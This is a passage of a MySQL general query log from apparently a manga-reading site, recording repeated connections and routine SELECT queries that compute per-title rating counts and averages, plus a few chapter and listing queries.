count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330639297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330639296 Quit 330639298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639297 Quit 330639298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330639299 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639299 Query select * FROM chapters where manga_id = '290' order by created desc limit 1 330639298 Quit 330639300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639299 Quit 330639300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330639300 Quit 330639301 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330639302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330639301 Quit 330639302 Quit 330639303 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330639303 Quit 330639304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639305 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330639305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330639304 Quit 330639305 Quit 330639307 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330639307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330639306 Quit 330639307 Quit 330639308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639309 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330639309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330639308 Quit 330639309 Quit 330639310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639311 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330639311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330639310 Quit 330639311 Quit 330639312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639313 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330639312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330639313 Quit 330639312 Quit 330639315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639314 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330639314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330639314 Quit 330639315 Quit 330639317 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330639316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330639317 Quit 330639316 Quit 330639318 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330639319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639318 Quit 330639319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330639319 Quit 330639320 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330639321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330639320 Quit 330639321 Quit 330639322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639323 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330639323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330639322 Quit 330639323 Quit 330639324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639325 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330639325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330639324 Quit 330639325 Quit 330639326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639327 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330639327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330639326 Quit 330639327 Quit 330639328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639329 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330639328 Quit 330639329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330639329 Quit 330639330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330639330 Quit 330639331 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330639332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639331 Quit 330639332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330639332 Quit 330639333 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330639334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330639334 Quit 330639333 Quit 330639335 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330639336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639335 Quit 330639336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330639336 Quit 330639337 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330639338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639337 Quit 330639338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330639338 Quit 330639339 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330639340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639339 Quit 330639340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330639340 Quit 330639341 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330639341 Quit 330639342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330639343 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639342 Quit 330639343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330639343 Quit 330639344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330639344 Quit 330639345 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330639346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639345 Quit 330639346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330639346 Quit 330639347 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330639348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639347 Quit 330639348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330639349 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330639348 Quit 330639349 Quit 330639350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639351 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330639350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330639350 Quit 330639351 Quit 330639352 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330639353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330639352 Quit 330639353 Quit 330639354 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330639355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639354 Quit 330639355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330639355 Quit 330639356 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330639356 Quit 330639357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330639357 Quit 330639358 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330639359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639358 Quit 330639359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330639359 Quit 330639360 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330639361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330639360 Quit 330639361 Quit 330639362 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330639363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330639363 Quit 330639362 Quit 330639365 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330639364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330639364 Quit 330639365 Quit 330639366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330639367 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639366 Quit 330639367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330639368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639367 Quit 330639368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330639368 Quit 330639369 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330639369 Quit 330639371 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330639370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639371 Quit 330639372 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330639370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330639372 Quit 330639370 Quit 330639373 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330639374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330639373 Quit 330639375 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639374 Quit 330639375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330639375 Quit 330639376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330639377 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639376 Quit 330639377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330639377 Quit 330639378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639379 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330639379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330639378 Quit 330639379 Quit 330639380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639381 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330639380 Quit 330639381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330639381 Quit 330639382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639383 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330639383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330639382 Quit 330639383 Quit 330639384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330639384 Quit 330639385 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330639385 Quit 330639386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330639387 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639386 Quit 330639387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330639387 Quit 330639388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639389 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330639389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330639388 Quit 330639389 Quit 330639390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330639391 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639390 Quit 330639391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330639391 Quit 330639392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639393 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330639392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330639393 Quit 330639392 Quit 330639395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639394 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330639394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330639394 Quit 330639395 Quit 330639396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639397 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330639397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330639396 Quit 330639397 Quit 330639398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330639399 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639398 Quit 330639399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330639400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330639400 Quit 330639401 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330639399 Quit 330639402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639401 Quit 330639403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330639402 Quit 330639404 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330639406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639404 Quit 330639405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330639403 Quit 330639407 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639406 Quit 330639405 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330639407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330639407 Quit 330639408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639409 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330639408 Quit 330639409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330639410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330639409 Quit 330639410 Quit 330639411 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330639412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330639411 Quit 330639412 Quit 330639413 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330639414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639413 Quit 330639414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330639414 Quit 330639415 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330639416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330639415 Quit 330639416 Quit 330639417 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330639418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330639417 Quit 330639418 Quit 330639419 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330639420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639419 Quit 330639420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330639421 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639420 Quit 330639421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330639421 Quit 330639422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639423 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330639423 Quit 330639424 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330639424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330639424 Quit 330639422 Quit 330639425 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330639426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639425 Quit 330639426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330639426 Quit 330639427 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330639427 Quit 330639428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330639428 Quit 330639429 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330639429 Quit 330639430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330639430 Quit 330639431 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330639432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330639431 Quit 330639432 Quit 330639433 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330639434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330639433 Quit 330639434 Quit 330639435 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330639435 Quit 330639436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330639437 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330639436 Quit 330639438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639437 Quit 330639438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330639438 Quit 330639439 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330639440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639439 Quit 330639440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330639440 Quit 330639441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639442 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330639442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330639441 Quit 330639442 Quit 330639443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330639443 Quit 330639444 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330639445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330639444 Quit 330639446 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639445 Quit 330639446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330639446 Quit 330639447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330639448 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639447 Quit 330639448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330639448 Quit 330639449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639449 Query select count(id) as total_rating, (sum(rating) / count(id)) 